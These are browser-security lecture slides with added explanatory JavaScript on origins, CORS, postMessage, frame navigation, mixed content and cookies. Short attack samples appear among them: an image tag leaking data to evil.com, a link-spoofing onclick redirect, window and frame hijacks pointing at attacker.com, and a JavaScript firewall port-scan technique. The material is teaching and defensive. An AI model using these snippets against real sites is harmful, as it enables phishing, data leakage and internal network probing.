Browser Security Model (Columbia University, suman/6183_slides/web_sec.pdf)
Original slides by Prof. John Mitchell
Web vs System vulnerabilities
• Decline in % web vulns since 2009
  • 49% in 2010 -> 37% in 2011
  • Big decline in SQL Injection vulnerabilities
• XSS peak
Reported Web Vulnerabilities "In the Wild"
Data from aggregator and validator of NVD-reported vulnerabilities
Web application vulnerabilities
Five lectures on Web security
• Browser security model
  • The browser as an OS and execution platform
  • Protocols, isolation, communication, …
• Web application security
  • Application pitfalls and defenses
• Content security policies
  • Additional mechanisms for sandboxing and security
• Authentication and session management
  • How users authenticate to web sites
  • Browser-server mechanisms for managing state
• HTTPS: goals and pitfalls
  • Network issues and browser protocol handling
This two-week section could fill an entire course
Web programming poll
• Familiar with basic HTML?
• Developed a web application using:
  • Apache? PHP? Ruby?
  • Python? SQL?
  • JavaScript? CSS?
  • JSON?
• Know about:
  • postMessage? NaCl? Webworkers? CSP?
  • WebView?
Resource: http://www.w3schools.com/
Goals of web security
• Safely browse the web
  • Users should be able to visit a variety of web sites, without incurring harm:
    • No stolen information
    • Site A cannot compromise session at Site B
• Support secure web applications
  • Applications delivered over the web should be able to achieve the same security properties as stand-alone applications
Web security threat model
Web attacker: sets up a malicious site visited by the victim (Alice); no control of the network.
(Diagram: Alice's system talking to the attacker's web site.)

Network security threat model
Network attacker: intercepts and controls network communication.
(Diagram: the attacker sits on the network path between Alice's system and the server.)

(Slide 12 shows both diagrams side by side for comparison.)
Web Threat Models
• Web attacker
  • Controls attacker.com
  • Can obtain SSL/TLS certificate for attacker.com
  • User visits attacker.com
    • Or: runs attacker's Facebook app, etc.
• Network attacker
  • Passive: wireless eavesdropper
  • Active: evil router, DNS poisoning
• Malware attacker
  • Attacker escapes browser isolation mechanisms and runs separately under control of OS
Malware attacker
• Browsers may contain exploitable bugs
  • Often enable remote code execution by web sites
  • Google study: [The Ghost in the Browser, 2007]
    • Found Trojans on 300,000 web pages (URLs)
    • Found adware on 18,000 web pages (URLs)
• Even if browsers were bug-free, still lots of vulnerabilities on the web
  • All of the vulnerabilities on previous graph: XSS, SQLi, CSRF, …
NOT OUR FOCUS IN THIS PART OF COURSE
Outline
• HTTP
• Rendering content
• Isolation
• Communication
• Navigation
• Security user interface
• Cookies
• Frames and frame busting
HTTP
URLs
Global identifiers of network-retrievable documents
Example: http://stanford.edu:81/class?name=cs155#homework
  • Protocol: http
  • Hostname: stanford.edu
  • Port: 81
  • Path: /class
  • Query: name=cs155
  • Fragment: homework
Special characters are encoded as hex:
• %0A = newline
• %20 or + = space, %2B = + (special exception)
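Added example, not from the slides: the URL above taken apart with Node's built-in WHATWG URL API, plus the decoding rule the slide calls a special exception. The point a practitioner should take away is that "+" means a space only inside the query (form decoding) and is an ordinary character in the path, so a filter that decodes one way and a server that decodes the other way will disagree about what the same bytes say. The function names are this example's own.

```javascript
// Added example (not from the slides): take apart the URL on the slide and show
// how percent-decoding differs between the path and the query.
// Uses Node's built-in WHATWG URL API; run with `node url_parts.js`.

// Split a URL into the six components the slide names.
function urlParts(urlString) {
  const u = new URL(urlString);
  return {
    protocol: u.protocol.replace(/:$/, ""), // "http"
    hostname: u.hostname,                   // "stanford.edu"
    port: u.port,                           // "81" (empty when it is the scheme default)
    path: u.pathname,                       // "/class"
    query: u.search.replace(/^\?/, ""),     // "name=cs155"
    fragment: u.hash.replace(/^#/, ""),     // "homework" (kept by the browser, never sent)
  };
}

// Decode a query value the way form decoders do: "+" is a space and "%2B" is a
// literal "+". decodeURIComponent on its own would leave "+" untouched.
function decodeQueryValue(raw) {
  return decodeURIComponent(raw.replace(/\+/g, " "));
}

// Decode a path segment: here "+" is an ordinary character; only %XX escapes change.
function decodePathSegment(raw) {
  return decodeURIComponent(raw);
}

// Parse a whole query string into a plain object. URLSearchParams applies the
// "+" rule for us, so this agrees with decodeQueryValue.
function parseQuery(query) {
  const out = {};
  for (const [k, v] of new URLSearchParams(query)) out[k] = v;
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(urlParts("http://stanford.edu:81/class?name=cs155#homework"));
  console.log(parseQuery("name=cs+155&op=a%2Bb%0Ac"));   // constructed sample query
}
```

Note that the fragment never leaves the browser: anything placed after `#` is invisible to the server and to server-side logs.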
HTTP Request
Method, file, HTTP version, then headers, a blank line, and the data (none for GET):
```http
GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

```
GET: no side effect. POST: possible side effect.
HTTP Response
HTTP version, status code, reason phrase, then headers (including cookies), a blank line, and the data:
```http
HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>
```
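Added example, not from the slides: a small parser for the two HTTP/1.x messages shown above. It splits the start line, collects headers (lower-cased, repeated headers kept as arrays), separates the body at the blank line, and checks whether a declared Content-Length agrees with the body actually present. The two sample messages are constructed here to mirror the slides; the Set-Cookie value is a placeholder because the slide elides it.

```javascript
// Added example (not from the slides): parse the request/response format above and
// check Content-Length against the body. Sample messages are constructed here.

// Parse one raw HTTP message (request or response) into its parts.
function parseHttpMessage(raw) {
  const text = raw.replace(/\r\n/g, "\n");
  const sep = text.indexOf("\n\n");                       // blank line ends the headers
  const head = sep === -1 ? text : text.slice(0, sep);
  const body = sep === -1 ? "" : text.slice(sep + 2);
  const lines = head.split("\n").filter((l) => l !== "");
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i === -1) throw new Error("malformed header line: " + line);
    const name = line.slice(0, i).trim().toLowerCase();   // header names are case-insensitive
    const value = line.slice(i + 1).trim();
    (headers[name] = headers[name] || []).push(value);     // repeated headers -> array
  }
  const words = lines[0].split(" ");
  if (words[0].startsWith("HTTP/")) {                      // status line => response
    return { kind: "response", version: words[0], status: Number(words[1]),
             reason: words.slice(2).join(" "), headers, body };
  }
  if (words.length !== 3) throw new Error("malformed request line: " + lines[0]);
  return { kind: "request", method: words[0], target: words[1], version: words[2], headers, body };
}

// Methods HTTP defines as side-effect free; the slide's "GET: no side effect".
function isSafeMethod(method) {
  return ["GET", "HEAD", "OPTIONS", "TRACE"].includes(method.toUpperCase());
}

// True when a declared Content-Length matches the bytes actually present. When the
// two disagree, sender and receiver no longer agree on where the message ends.
function contentLengthMatches(msg) {
  const declared = msg.headers["content-length"];
  if (!declared) return true;                              // nothing declared, nothing to check
  return Number(declared[0]) === Buffer.byteLength(msg.body, "utf8");
}

// Constructed samples mirroring the two slides.
const SAMPLE_REQUEST = [
  "GET /index.html HTTP/1.1",
  "Accept: image/gif, image/x-bitmap, image/jpeg, */*",
  "Accept-Language: en",
  "Connection: Keep-Alive",
  "User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
  "Host: www.example.com",
  "Referer: http://www.google.com?q=dingbats",
  "", "",
].join("\r\n");

const SAMPLE_RESPONSE = [
  "HTTP/1.0 200 OK",
  "Date: Sun, 21 Apr 1996 02:20:42 GMT",
  "Server: Microsoft-Internet-Information-Server/5.0",
  "Connection: keep-alive",
  "Content-Type: text/html",
  "Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT",
  "Set-Cookie: id=PLACEHOLDER",                            // slide elides the value
  "Content-Length: 2543",
  "",
  "<HTML> Some data... blah, blah, blah </HTML>",
].join("\r\n");

if (typeof require !== "undefined" && require.main === module) {
  console.log(parseHttpMessage(SAMPLE_REQUEST));
  console.log(contentLengthMatches(parseHttpMessage(SAMPLE_RESPONSE)));   // slide body is far shorter than 2543
}
```

The slide's response declares 2543 bytes but shows a 44-byte body, so `contentLengthMatches` reports `false` for it; in real traffic that kind of disagreement is exactly what a proxy or log pipeline should flag rather than silently repair.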
RENDERING CONTENT
Rendering and events
Basic browser execution model
• Each browser window or frame
  • Loads content
  • Renders it
    • Processes HTML and scripts to display page
    • May involve images, subframes, etc.
  • Responds to events
Events can be
• User actions: OnClick, OnMouseover
• Rendering: OnLoad, OnBeforeUnload
• Timing: setTimeout(), clearTimeout()
Example
Source: http://www.w3schools.com/js/js_output.asp
```html
<!DOCTYPE html>
<html>
<body>
<h1>My First Web Page</h1>
<p>My first paragraph.</p>
<button onclick="document.write(5 + 6)">Try it</button>
</body>
</html>
```
Document Object Model (DOM)
Object-oriented interface used to read and write docs
• Web page in HTML is structured data
• DOM provides representation of this hierarchy
Examples
• Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]
• Methods: document.write(document.referrer)
Includes Browser Object Model (BOM)
• window, document, frames[], history, location, navigator (type and version of browser)
Example
Source: http://www.w3schools.com/js/js_output.asp
```html
<!DOCTYPE html>
<html>
<body>
<h1>My First Web Page</h1>
<p>My First Paragraph</p>
<p id="demo"></p>
<script>
  document.getElementById("demo").innerHTML = 5 + 6;
</script>
</body>
</html>
```
Changing HTML using Script, DOM
Some possibilities
• createElement(elementName)
• createTextNode(text)
• appendChild(newChild)
• removeChild(node)
Example: Add a new list item:
```javascript
var text = "Item 2";                          // text for the new item (value constructed for the example)
var list = document.getElementById('t1');     // the <ul> below
var newitem = document.createElement('li');
var newtext = document.createTextNode(text);  // text node: inserted as text, never parsed as HTML
list.appendChild(newitem);
newitem.appendChild(newtext);
```
HTML:
```html
<ul id="t1">
  <li> Item 1 </li>
</ul>
```
HTML Image Tags
Displays this nice picture. Security issues?
```html
<html>
…
<p> … </p>
…
<img src="http://example.com/sunset.gif" height="50" width="100">
…
</html>
```
Basic web functionality
Image tag security issues
• Communicate with other sites
  • <img src="http://evil.com/pass-local-information.jpg?extra_information">
• Hide resulting image
  • <img src=" … " height="1" width="1">
• Spoof other sites
  • Add logos that fool a user
Important Point: A web page can send information to any site
Security consequences
Q: what threat model are we talking about here?
JavaScript onError
Basic function
• Triggered when error occurs loading a document or an image
Example
• Runs onError handler if image does not exist and cannot load
```html
<img src="image.gif" onerror="alert('The image could not be loaded.')">
```
http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
JavaScript timing
Sample code
• When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler.
```html
<html><body>
<img id="test" style="display: none">
<script>
  var test = document.getElementById('test');
  var start = new Date();
  test.onerror = function() {
    var end = new Date();
    alert("Total time: " + (end - start));
  };
  test.src = "http://www.example.com/page.html";
</script>
</body></html>
```
Basic web functionality
Port scanning behind firewall
JavaScript can:
• Request images from internal IP addresses
  • Example: <img src="192.168.0.4:8080"/>
• Use timeout/onError to determine success/failure
• Fingerprint webapps using known image names
(Diagram: 1) the browser asks the malicious web page "show me dancing pigs!"; 2) the page replies "check this out"; the browser then scans servers behind the firewall and 3) returns the port scan results to the page.)
Security consequence
Remote scripting
Goal
• Exchange data between a client-side app running in a browser and server-side app, without reloading page
Methods
• Java Applet/ActiveX control/Flash
  • Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
• XML-RPC
  • Open, standards-based technology that requires XML-RPC libraries on server and in your client-side code
• Simple HTTP via a hidden IFRAME
  • IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options
See: http://developer.apple.com/internet/webcontent/iframe.html
Important Point: A page can maintain bi-directional communication with browser (until user closes/quits)
Simple remote scripting example
client.html: "RPC" by passing arguments to server.html in query string
```html
<script type="text/javascript">
  function handleResponse() {
    alert('this function is called from server.html');
  }
</script>
<iframe id="RSIFrame" name="RSIFrame"
        style="width:0px; height:0px; border: 0px"
        src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>
```
server.html: another page on same server, could be server.php, etc.
```html
<script type="text/javascript">
  window.parent.handleResponse();
</script>
```
RPC can be done silently in JavaScript, passing and receiving arguments
ISOLATION
Frame and iFrame
Window may contain frames from different sources
• Frame: rigid division as part of frameset
• iFrame: floating inline frame
Why use frames?
• Delegate screen area to content from another source
• Browser provides isolation based on frames
• Parent may work even if frame is broken
iFrame example
```html
<iframe src="hello.html" width=450 height=100>
  If you can see this, your browser doesn't understand IFRAME.
</iframe>
```
Windows Interact
Analogy
| | Operating system | Web browser |
|---|---|---|
| Primitives | System calls, processes, disk | Document object model, frames, cookies / localStorage |
| Principals | Users; discretionary access control | "Origins"; mandatory access control |
| Vulnerabilities | Buffer overflow, root exploit | Cross-site scripting, cross-site request forgery, cache history attacks, … |
Policy Goals
• Safe to visit an evil web site
• Safe to visit two pages at the same time
  • Address bar distinguishes them
• Allow safe delegation
Browser security mechanism
• Each frame of a page has an origin
  • Origin = protocol://host:port
• Frame can access its own origin
  • Network access, read/write DOM, storage (cookies)
• Frame cannot access data associated with a different origin
(Diagram: a page containing frames from origins A and B; each A frame may touch only A's data, each B frame only B's.)
Components of browser security policy
• Frame-frame relationships
  • canScript(A,B): Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
  • canNavigate(A,B): Can Frame A change the origin of content for Frame B?
• Frame-principal relationships
  • readCookie(A,S), writeCookie(A,S): Can Frame A read/write cookies from site S?
See https://code.google.com/p/browsersec/wiki/Part1 and https://code.google.com/p/browsersec/wiki/Part2
Library import excluded from SOP
```html
<script src=https://seal.verisign.com/getseal?host_name=a.com></script>
```
• Script has privileges of imported page, NOT source server.
• Can script other pages in this origin, load more scripts
• Other forms of importing
(Slide shows the VeriSign seal as the imported content.)
Domain Relaxation
Origin: scheme, host, (port), hasSetDomain
Try document.domain=document.domain
(Diagram: frames at www.facebook.com and chat.facebook.com, each relaxing document.domain to facebook.com.)
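Added example, not from the slides and not any browser's code: a simplified model of the origin check from the "Browser security mechanism" slide and of the document.domain relaxation above. It makes the default port explicit, tracks the slide's hasSetDomain bit, and reproduces the "document.domain=document.domain" effect: setting the property, even to its current value, flips the bit, so a frame that did so can no longer script a same-host frame that did not. The public-suffix rule is approximated by refusing to relax to a single-label domain; that approximation and all class and function names are this example's own.

```javascript
// Added example (not from the slides, not browser code): origin comparison and
// document.domain relaxation as a small model.

const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Origin as the slide defines it: protocol://host:port, default port made explicit.
function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return `${u.protocol}//${u.hostname.toLowerCase()}:${port}`;
}

function sameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// A frame's origin state: scheme, host, port and whether document.domain was set.
class FrameOrigin {
  constructor(urlString) {
    const u = new URL(urlString);
    this.scheme = u.protocol;
    this.host = u.hostname.toLowerCase();
    this.port = u.port || DEFAULT_PORTS[u.protocol] || "";
    this.effectiveDomain = this.host;
    this.hasSetDomain = false;
  }

  // document.domain = value: only the host itself or one of its parent domains is
  // accepted. Assumption: a single-label value ("com") stands in for the public
  // suffix list a real browser consults.
  setDomain(value) {
    const v = value.toLowerCase();
    const isSelfOrParent = v === this.host || this.host.endsWith("." + v);
    if (!isSelfOrParent) throw new Error(`${v} is not a parent of ${this.host}`);
    if (!v.includes(".")) throw new Error(`refusing to relax to top-level domain ${v}`);
    this.effectiveDomain = v;
    this.hasSetDomain = true;   // flipped even when v === host: the slide's document.domain=document.domain
  }
}

// canScript(A, B): may frame A touch frame B's DOM?
function canScript(a, b) {
  if (a.scheme !== b.scheme) return false;
  if (a.hasSetDomain !== b.hasSetDomain) return false;     // one side relaxed, the other not
  if (!a.hasSetDomain) return a.host === b.host && a.port === b.port;
  return a.effectiveDomain === b.effectiveDomain;          // after relaxation the port is not compared
}

if (typeof require !== "undefined" && require.main === module) {
  const www = new FrameOrigin("http://www.facebook.com/");
  const chat = new FrameOrigin("http://chat.facebook.com/");
  console.log(canScript(www, chat));                        // false: different hosts
  www.setDomain("facebook.com"); chat.setDomain("facebook.com");
  console.log(canScript(www, chat));                        // true: both relaxed to the same domain
}
```

Two consequences worth noticing: relaxing to facebook.com means every host under that domain that does the same can script you, not just the one you had in mind, and the port drops out of the comparison once the domain is set.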
Additional mechanisms
• Cross-origin network requests
  • Access-Control-Allow-Origin: <list of domains>
  • Access-Control-Allow-Origin: *
• Cross-origin client-side communication
  • Client-side messaging via navigation (old browsers)
  • postMessage (modern browsers)
(Diagram: a Site A context and a Site B context exchanging messages.)
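Added example, not from the slides: both halves of a cross-origin network request. On the server, the Access-Control-Allow-Origin value is chosen per request from an allow-list (the "<list of domains>" case; the header itself can name only one origin, so the matching entry is echoed back with Vary: Origin) or set to "*" for public data. On the browser side, a function decides whether the calling page may read the response, including the rule that "*" never works together with credentials. Origins, the allow-list and the function names are constructed for this example.

```javascript
// Added example (not from the slides): server-side CORS header selection beside
// the browser-side read check it is enforced by. Origins here are constructed.

// Server side: headers for a request carrying Origin: requestOrigin.
// Returns an empty object when the origin is not allowed, so the browser blocks the read.
function corsHeadersFor(requestOrigin, allowList, { credentials = false } = {}) {
  if (!allowList.includes(requestOrigin)) return {};  // exact match only: no prefix/suffix tricks
  const headers = {
    "Access-Control-Allow-Origin": requestOrigin,
    "Vary": "Origin",                                  // caches must key the response on Origin
  };
  if (credentials) headers["Access-Control-Allow-Credentials"] = "true";
  return headers;
}

// The "*" form: fine for public, unauthenticated data. Browsers refuse "*" together
// with credentials, so this function refuses to emit that combination.
function corsHeadersPublic({ credentials = false } = {}) {
  if (credentials) throw new Error("Access-Control-Allow-Origin: * cannot be used with credentials");
  return { "Access-Control-Allow-Origin": "*" };
}

// Browser side: may script running at pageOrigin read a response with these headers?
function browserAllowsRead(responseHeaders, pageOrigin, withCredentials = false) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  if (acao === undefined) return false;                // no header: same-origin policy applies
  if (acao === "*") return !withCredentials;           // wildcard never unlocks credentialed reads
  if (acao !== pageOrigin) return false;               // exact string comparison
  if (withCredentials && responseHeaders["Access-Control-Allow-Credentials"] !== "true") return false;
  return true;
}

if (typeof require !== "undefined" && require.main === module) {
  const allow = ["https://app.example", "https://admin.example"];   // constructed allow-list
  console.log(corsHeadersFor("https://app.example", allow));
  console.log(corsHeadersFor("https://app.example.evil", allow));   // {} : lookalike origin rejected
}
```

The allow-list check is a plain string equality on the whole origin, scheme included, because a startsWith or regex match is the usual way an allow-list ends up accepting app.example.evil or a plain-http variant of a trusted site.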
COMMUNICATION
window.postMessage
• API for inter-frame communication
• Supported in standard browsers
• A network-like channel between frames
(Diagram: a page whose "Add a contact" and "Share contacts" widgets live in separate frames.)
postMessage syntax
```javascript
frames[0].postMessage("Attack at dawn!", "http://b.com/");

window.addEventListener("message", function (e) {
  if (e.origin == "http://a.com") { ... e.data ... }
}, false);
```
Facebook Anecdote
(Diagram: the message "Attack at dawn!" arriving in the target frame.)
Why include "targetOrigin"?
What goes wrong?
```javascript
frames[0].postMessage("Attack at dawn!");
```
Messages sent to frames, not principals
• When would this happen?
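Added example, not from the slides and not browser code: a small simulation of window.postMessage that answers the two questions above. Frames are objects with a current origin that navigation can change; the sender's targetOrigin is compared against that current origin at delivery time, so a message aimed at b.com is dropped when someone has navigated the frame to another site, while an unrestricted send is handed to whatever now lives there. The receiver side shows the exact origin comparison from the syntax slide. The "*" wildcard stands in for the slide's no-targetOrigin call; frames, origins and messages are constructed here.

```javascript
// Added example (not from the slides, not browser code): simulated postMessage
// showing why targetOrigin matters and how a receiver should check e.origin.

// A frame has a current origin (navigation changes it) and message listeners.
class SimFrame {
  constructor(origin) { this.origin = origin; this.listeners = []; }
  navigate(newOrigin) { this.origin = newOrigin; this.listeners = []; }  // new document, new listeners
  addEventListener(type, fn) { if (type === "message") this.listeners.push(fn); }
}

// Sender side: deliver only if the frame's *current* origin equals targetOrigin
// (or targetOrigin is "*"). Returns whether it was delivered; a real browser does
// not tell the sender, the return value just makes the scenario checkable.
function postMessage(targetFrame, data, targetOrigin, senderOrigin) {
  const wanted = targetOrigin === "*" ? "*" : new URL(targetOrigin).origin;  // "http://b.com/" -> "http://b.com"
  if (wanted !== "*" && wanted !== targetFrame.origin) return false;         // silently dropped
  const event = { origin: senderOrigin, data, source: senderOrigin };
  for (const fn of targetFrame.listeners) fn(event);
  return true;
}

// Receiver side: exact comparison, as in the slide's e.origin == "http://a.com".
// A prefix or substring check would also accept "http://a.com.evil.com".
function makeMessageHandler(trustedOrigin, onData) {
  return function (e) {
    if (e.origin !== trustedOrigin) return;
    onData(e.data);
  };
}

// Scenario from the slide: a.com owns a frame that is supposed to show b.com.
// frameNavigatedTo (optional) is the origin someone navigated that frame to first.
function runScenario(targetOrigin, frameNavigatedTo) {
  const received = [];                                  // what listeners in the frame saw
  const frame = new SimFrame("http://b.com");
  frame.addEventListener("message", makeMessageHandler("http://a.com", (d) => received.push("b:" + d)));
  if (frameNavigatedTo) {
    frame.navigate(frameNavigatedTo);                    // other content now lives in the frame
    frame.addEventListener("message", (e) => received.push("other:" + e.data));
  }
  const delivered = postMessage(frame, "Attack at dawn!", targetOrigin, "http://a.com");
  return { delivered, received };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(runScenario("http://b.com/", null));             // delivered to b.com
  console.log(runScenario("http://b.com/", "http://evil.com")); // dropped: frame is no longer b.com
  console.log(runScenario("*", "http://evil.com"));             // delivered to whoever is there
}
```

This is the slide's "messages sent to frames, not principals" in code: the frame reference stays valid across navigation, so only the targetOrigin argument ties the message to the principal the sender had in mind.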
NAVIGATION
A Guninski Attack
(Diagram: a window named awglogin, which another page can target by that name.)
```javascript
window.open("https://attacker.com/", "awglogin");
```
What should the policy be?
• Child
• Sibling
• Descendant
• Frame Bust
Legacy Browser Behavior
| Browser | Policy |
|---|---|
| IE6 (default) | Permissive |
| IE6 (option) | Child |
| IE7 (no Flash) | Descendant |
| IE7 (with Flash) | Permissive |
| Firefox 2 | Window |
| Safari 3 | Permissive |
| Opera 9 | Window |
| HTML5 | Child |
Window Policy Anomaly
```javascript
top.frames[1].location = "http://www.attacker.com/...";
top.frames[2].location = "http://www.attacker.com/...";
...
```
Adoption of Descendant Policy
| Browser | Policy |
|---|---|
| IE7 (no Flash) | Descendant |
| IE7 (with Flash) | Descendant |
| Firefox 3 | Descendant |
| Safari 3 | Descendant |
| Opera 9 | (many policies) |
| HTML5 | Descendant |
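Added example, not from the slides and not browser code: a frame-tree model of the four policies named in the tables above, answering the earlier canNavigate(A,B) question ("can Frame A change the origin of content for Frame B?") for a given policy. Building the page behind the "Window Policy Anomaly" slide, a top page holding an attacker-controlled frame next to a login frame, shows which policies let one sibling redirect the other. The descendant rule here also lets a frame navigate its own top-level window (the "Frame Bust" option); that pairing, the frame tree and all names are this example's simplification, and real browsers add origin- and sandbox-based rules on top.

```javascript
// Added example (not from the slides, not browser code): frame navigation policies
// over a frame tree. canNavigate(policy, A, B) = may A change what B displays?

class Frame {
  constructor(name, parent = null) {
    this.name = name; this.parent = parent; this.children = [];
    if (parent) parent.children.push(this);
  }
}

function topOf(frame) { let f = frame; while (f.parent) f = f.parent; return f; }

function isDescendant(ancestor, frame) {
  for (let p = frame.parent; p; p = p.parent) if (p === ancestor) return true;
  return false;
}

const POLICIES = {
  permissive: (a, b) => true,                        // any frame may navigate any other
  window:     (a, b) => topOf(a) === topOf(b),       // anything in the same window, siblings included
  child:      (a, b) => b.parent === a,              // only direct children
  descendant: (a, b) => isDescendant(a, b)           // anything below A in the tree,
                        || b === topOf(a),           // plus A's own top window (frame busting; assumption of this model)
};

function canNavigate(policy, a, b) {
  if (a === b) return true;                          // a frame may always navigate itself
  const rule = POLICIES[policy];
  if (!rule) throw new Error("unknown policy: " + policy);
  return rule(a, b);
}

// Layout behind the "Window Policy Anomaly" slide (constructed): a top page with an
// attacker-controlled frame beside a login frame; the attacker frame has a child.
function buildAnomalyPage() {
  const top = new Frame("top");
  const attacker = new Frame("frames[0]", top);
  const login = new Frame("frames[1]", top);
  const inner = new Frame("inner", attacker);
  return { top, attacker, login, inner };
}

// Which policies let the attacker frame redirect its sibling, the login frame?
function policiesAllowingSiblingNavigation() {
  const { attacker, login } = buildAnomalyPage();
  return Object.keys(POLICIES).filter((p) => canNavigate(p, attacker, login));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(policiesAllowingSiblingNavigation());   // ["permissive", "window"]
}
```

The window policy from the Firefox 2 / Opera 9 row is exactly what makes the anomaly slide work: the attacker's frame shares a top window with the login frame, so the policy says yes; child and descendant both say no because the login frame is not below the attacker's frame in the tree.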
SECURITY USER INTERFACE
When is it safe to type my password?
Safe to type your password?
(Slides 55–59: screenshots of browser windows and login pages for discussion; no text content beyond the question.)
Mixed Content: HTTP and HTTPS
Problem
• Page loads over HTTPS, but has HTTP content
• Network attacker can control page
IE: displays mixed-content dialog to user
• Flash files over HTTP loaded with no warning (!)
• Note: Flash can script the embedding page
Firefox: red slash over lock icon (no dialog)
• Flash files over HTTP do not trigger the slash
Safari: does not detect mixed content
Dan will talk about this later….
Mixed Content: HTTP and HTTPS (silly dialogs)
(Slide shows screenshots of the browsers' mixed-content dialogs.)
Mixed content and network attacks
banks: after login all content over HTTPS n Developer error: Somewhere on bank site write
<script src=http://www.site.com/script.js> </script>
n Active network attacker can now hijack any session
Better way to include content:
<script src=//www.site.com/script.js> </script>
n served over the same protocol as embedding page
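As an added example (not part of the original slides), the check below classifies the subresources of a page the way a browser's mixed-content logic does, and shows how a protocol-relative `//host/...` reference resolves against the embedding page. The page URL, host names and resource list are constructed for the example; nothing here is fetched from the network.

```javascript
// Added example (not from the slides): classify a page's subresources as secure,
// mixed-active or mixed-passive the way a browser's mixed-content check does,
// resolving protocol-relative "//host/..." references against the embedding page.
// The page URL, host names and resource list are constructed for this example.

// Fetch destinations whose content can run script or otherwise control the
// embedding document.  Any of these arriving over plain HTTP hands an active
// network attacker the HTTPS page.
const ACTIVE_DESTINATIONS = new Set(["script", "iframe", "stylesheet", "object", "xhr", "font"]);

function classifyResource(pageUrl, ref, destination) {
  const page = new URL(pageUrl);
  const target = new URL(ref, page);          // "//www.site.com/x" inherits page.protocol
  let status;
  if (page.protocol !== "https:") status = "page-not-https";   // nothing to protect yet
  else if (target.protocol === "https:" || target.protocol === "wss:") status = "secure";
  else if (target.protocol === "http:" || target.protocol === "ws:")
    status = ACTIVE_DESTINATIONS.has(destination) ? "mixed-active" : "mixed-passive";
  else status = "other";                       // data:, blob:, about: are not network fetches
  return { url: target.href, destination, status };
}

function auditPage(pageUrl, resources) {
  const results = resources.map(r => classifyResource(pageUrl, r.ref, r.destination));
  let verdict = "OK";
  // One mixed-active resource is a full compromise of the page; passive mixed
  // content (images, media) can be observed and swapped but cannot run script.
  if (results.some(r => r.status === "mixed-active")) verdict = "FAIL: attacker can control page";
  else if (results.some(r => r.status === "mixed-passive")) verdict = "WARN: passive mixed content";
  return { results, verdict };
}

// Constructed sample: the bank page from the slide, including the developer error.
const SAMPLE_PAGE = "https://www.bank.example/account";
const SAMPLE_RESOURCES = [
  { ref: "http://www.site.com/script.js", destination: "script" }, // the error on the slide
  { ref: "//www.site.com/script.js",      destination: "script" }, // protocol-relative: follows the page
  { ref: "/static/app.js",                destination: "script" }, // same-origin, relative
  { ref: "http://cdn.example/logo.png",   destination: "image"  }, // passive mixed content
];

const report = auditPage(SAMPLE_PAGE, SAMPLE_RESOURCES);
for (const r of report.results) console.log(r.status.padEnd(14), r.destination.padEnd(7), r.url);
console.log(report.verdict);  // FAIL: attacker can control page
```

The classifier deliberately ignores browser auto-upgrading and the `upgrade-insecure-requests` CSP directive; run it over the resource list a page actually references (from the HTML or from a HAR capture) to find the stray `http://` script before the network attacker does.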
Lock Icon 2.0
Extended validation (EV) certs
• Prominent security indicator for EV certificates
• note: an EV site loading content from a non-EV site does not trigger a mixed-content warning; HTTPS is HTTPS, and the EV indicator says nothing about where the page's scripts come from
• Chrome and Firefox removed the special EV indicator from the address bar in 2019 after user studies showed it was not noticed; an EV site now looks like any other HTTPS site
Finally: the status bar
Trivially spoofable: the status bar shows the href at hover time, but an onclick handler can change it before the navigation happens
<a href="http://www.paypal.com/" onclick="this.href = 'http://www.evil.com/';">PayPal</a>
COOKIES: CLIENT STATE
Cookies
Used to store state on the user's machine
Browser → Server:  POST …
Server → Browser:  HTTP header  Set-Cookie: NAME=VALUE; domain=(who can read); path=(which URLs); expires=(when it expires); secure=(only over SSL/TLS)
Browser → Server (every later request in scope):  Cookie: NAME=VALUE
HTTP is a stateless protocol; cookies add state
If there is no expires (or max-age) attribute: the cookie lives for this browser session only
Cookie authentication (Browser, Web Server, Auth server)
Browser → Web Server:  POST login.cgi  (username & pwd)
Web Server → Auth server:  validate user
Auth server → Web Server:  auth=val  (auth server stores val)
Web Server → Browser:  Set-Cookie: auth=val
Browser → Web Server:  GET restricted.html  Cookie: auth=val
Web Server → Auth server:  auth=val  (check val)
Auth server → Web Server:  YES/NO
Web Server → Browser:  if YES, restricted.html
Cookie Security Policy
Uses:
• User authentication
• Personalization
• User tracking: e.g. Doubleclick (3rd-party cookies)
Browser will store a bounded number: these slides cite at most 20 cookies/site and 3 KB/cookie; RFC 6265 requires browsers to accept at least 50 cookies per domain and at least 4096 bytes per cookie
Cookie scope is the pair <domain, path>, not the same-origin tuple: scheme and port are ignored, so an HTTP page and an HTTPS page on the same host share cookies unless the Secure flag is set
• Can set cookies valid across a domain suffix: login.site.com may set domain=site.com, readable by every *.site.com host; browsers refuse public suffixes such as .com
Secure Cookies
Browser → Server:  GET …
Server → Browser:  HTTP header  Set-Cookie: NAME=VALUE; Secure
(Secure is a bare flag; the slide's Secure=true form works only because browsers ignore the value)
• Provides confidentiality against a network attacker
• Browser will only send the cookie back over HTTPS
• … but no integrity
